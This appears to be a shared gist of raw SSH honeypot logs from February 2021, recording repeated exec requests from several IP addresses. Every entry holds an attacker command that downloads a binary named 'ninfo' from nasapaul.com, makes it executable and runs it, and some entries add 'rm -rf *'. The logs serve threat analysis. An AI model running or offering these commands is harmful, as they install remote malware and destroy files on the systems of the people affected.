-
-
Save malwaremily/aa37b170ab02429c42eb70592a783a33 to your computer and use it in GitHub Desktop.
nasapaul security event raw logs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
12:22:55.220 services ▶ DEBU 6472 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000f48000] 0} 0xc000efa960 {0 0} 0xc000efaa80 0xc000efaf60 0xc000e9c300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95440) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e953e0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433110 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc000e99a20 0xc000e99a20 false}) %!s(*ssh.buffer=&{0xc000032900 0xc000e99a60 0xc000e99a60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf * | |
services > ssh > category=ssh, date=2021-02-14 12:22:55.22099094 +0000 UTC m=+1345163.502386732, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=49642, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khc7gk9kn000dnacu0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
12:26:30.497 services ▶ DEBU 64db Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000938000] 0} 0xc00006b080 {0 0} 0xc00006b1a0 0xc00006b2c0 0xc000032080 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d6420) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d63c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482820 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc00115ee00 0xc00115ee00 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc00115ef20 0xc00115ef20 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) Alscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf * | |
services > ssh > category=ssh, date=2021-02-14 12:26:30.49813889 +0000 UTC m=+1345378.779534691, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=167.99.253.119, source-port=45348, ssh.exec=[]string{"lscpu ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x41, 0x6c, 0x73, 0x63, 0x70, 0x75, 0x20, 0x3b, 0x20, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x72, 0x6d, 0x20, 0x2d, 0x72, 0x66, 0x20, 0x2a}, ssh.request-type=exec, ssh.sessionid=c0khdt8k9kn000dnadb0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
15:00:09.483 services ▶ DEBU 6aac Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc000e955c0 {0 0} 0xc000e956e0 0xc000e95740 0xc000e9c200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001148b20 {0 0 0 <nil> <nil>} 824633927088}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000325c0 0xc000e984e0 0xc000e984e0 false}) %!s(*ssh.buffer=&{0xc000032600 0xc000e98520 0xc000e98520 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-15 15:00:09.484309044 +0000 UTC m=+1440997.765704822, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=52828, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8ou0k9kn000dnaj7g, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
15:04:27.762 services ▶ DEBU 6b11 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000ae0840 {{0 0} [0xc001016480] 0} 0xc0011d7260 {0 0} 0xc0011d72c0 0xc0011d7320 0xc000e9cb80 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824633929008}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032d40 0xc000e99940 0xc000e99940 false}) %!s(*ssh.buffer=&{0xc000032d80 0xc000e99980 0xc000e99980 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-15 15:04:27.762821171 +0000 UTC m=+1441256.044216965, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=64.225.101.223, source-port=60866, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0l8qugk9kn000dnajk0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:49.380 services ▶ DEBU 6ce9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc0011d6840 {0 0} 0xc0011d69c0 0xc0011d6a20 0xc0000325c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa4e0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039370 {0 0 0 <nil> <nil>} 824649040368}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c200 0xc000e98540 0xc000e98540 false}) %!s(*ssh.buffer=&{0xc000e9c240 0xc000e98580 0xc000e98580 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:49.381412233 +0000 UTC m=+1476557.662808034, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=50930, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo0k9kn000dnalfg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:50.686 services ▶ DEBU 6cee Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de160 {{0 0} [0xc000e52180] 0} 0xc0011d6fc0 {0 0} 0xc0011d7020 0xc0011d70e0 0xc0000327c0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d71a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7140) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f90 {0 0 0 <nil> <nil>} 824633927792}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032880 0xc0011fe9c0 0xc0011fe9c0 false}) %!s(*ssh.buffer=&{0xc000032900 0xc0011fea00 0xc0011fea00 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:50.686498457 +0000 UTC m=+1476558.967894237, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56258, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheo8k9kn000dnalg0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:58.117 services ▶ DEBU 6cf3 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee000 {{0 0} [0xc0000ba540] 0} 0xc000efade0 {0 0} 0xc000efae40 0xc000efaea0 0xc000e9c500 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efafc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efaf60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039fe8 {0 0 0 <nil> <nil>} 824649041328}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c5c0 0xc000e98d80 0xc000e98d80 false}) %!s(*ssh.buffer=&{0xc000e9c600 0xc000e98de0 0xc000e98de0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:58.117645982 +0000 UTC m=+1476566.399041785, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59120, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheq8k9kn000dnalgg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:52:59.349 services ▶ DEBU 6cf8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de580 {{0 0} [0xc000e523c0] 0} 0xc000efb380 {0 0} 0xc000efb3e0 0xc000efb440 0xc000e9c700 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7560) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7500) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004326e8 {0 0 0 <nil> <nil>} 824633929392}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032ec0 0xc0011feea0 0xc0011feea0 false}) %!s(*ssh.buffer=&{0xc000032f00 0xc0011feee0 0xc0011feee0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:52:59.349959932 +0000 UTC m=+1476567.631356102, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=35994, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lheqgk9kn000dnalh0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:26.631 services ▶ DEBU 6cfd Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee160 {{0 0} [0xc0000ba900] 0} 0xc0011d76e0 {0 0} 0xc0011d7740 0xc0011d77a0 0xc000033100 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efb980) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efb860) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e91680 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99880 0xc000e99880 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e998c0 0xc000e998c0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:26.632099423 +0000 UTC m=+1476594.913495286, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=59004, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf18k9kn000dnalhg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:29.019 services ▶ DEBU 6d02 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000dee2c0 {{0 0} [0xc000e52600] 0} 0xc0011d7860 {0 0} 0xc0011d78c0 0xc0011d7920 0xc000033240 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7a40) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7980) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000433468 {0 0 0 <nil> <nil>} 824633930544}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000033340 0xc0011ff720 0xc0011ff720 false}) %!s(*ssh.buffer=&{0xc000033380 0xc0011ff760 0xc0011ff760 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:29.019387375 +0000 UTC m=+1476597.300783158, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=41322, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf20k9kn000dnali0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:30.330 services ▶ DEBU 6d07 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de6e0 {{0 0} [0xc0000bac00] 0} 0xc0011d7e00 {0 0} 0xc0011d7e60 0xc0011d7ec0 0xc000033480 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efbf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efbf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011486f8 {0 0 0 <nil> <nil>} 824649043760}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cf40 0xc000e99f60 0xc000e99f60 false}) %!s(*ssh.buffer=&{0xc000e9cf80 0xc000e99fa0 0xc000e99fa0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:30.330822166 +0000 UTC m=+1476598.612217958, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46912, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf28k9kn000dnalig, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
00:53:32.568 services ▶ DEBU 6d0c Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de840 {{0 0} [0xc0000bad80] 0} 0xc00006be00 {0 0} 0xc00006bec0 0xc00006bf20 0xc000033640 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e94720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e94360) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc001149468 {0 0 0 <nil> <nil>} 824649044464}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9d200 0xc001151c00 0xc001151c00 false}) %!s(*ssh.buffer=&{0xc000e9d240 0xc001151d40 0xc001151d40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 00:53:32.568412599 +0000 UTC m=+1476600.849808398, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=56648, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhf2ok9kn000dnalj0, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:19:33.077 services ▶ DEBU 6fe9 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc000e52420 {{0 0} [0xc0009c0480] 0} 0xc0011d7a40 {0 0} 0xc0011d7aa0 0xc0011d7b00 0xc000032d40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d7bc0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d7b60) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000039d28 {0 0 0 <nil> <nil>} 824633929200}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032e00 0xc0011fec20 0xc0011fec20 false}) %!s(*ssh.buffer=&{0xc000032e40 0xc0011fec60 0xc0011fec60 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:19:33.077819662 +0000 UTC m=+1478161.359215439, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=38310, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhr90k9kn000dnaoeg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
01:19:41.604 services ▶ DEBU 6ff2 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0009c0780] 0} 0xc00006bda0 {0 0} 0xc00006be00 0xc00006bec0 0xc000033200 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc00006bf80) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc00006bf20) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827e0 {0 0 0 <nil> <nil>} 824633930416}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc0000332c0 0xc0011ff500 0xc0011ff500 false}) %!s(*ssh.buffer=&{0xc000033300 0xc0011ff540 0xc0011ff540 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo | |
services > ssh > category=ssh, date=2021-02-16 01:19:41.605220152 +0000 UTC m=+1478169.886615964, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.99.239, source-port=46416, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0lhrb0k9kn000dnaofg, token=c0a8v4ok9kn000dn77n0, type=ssh-request | |
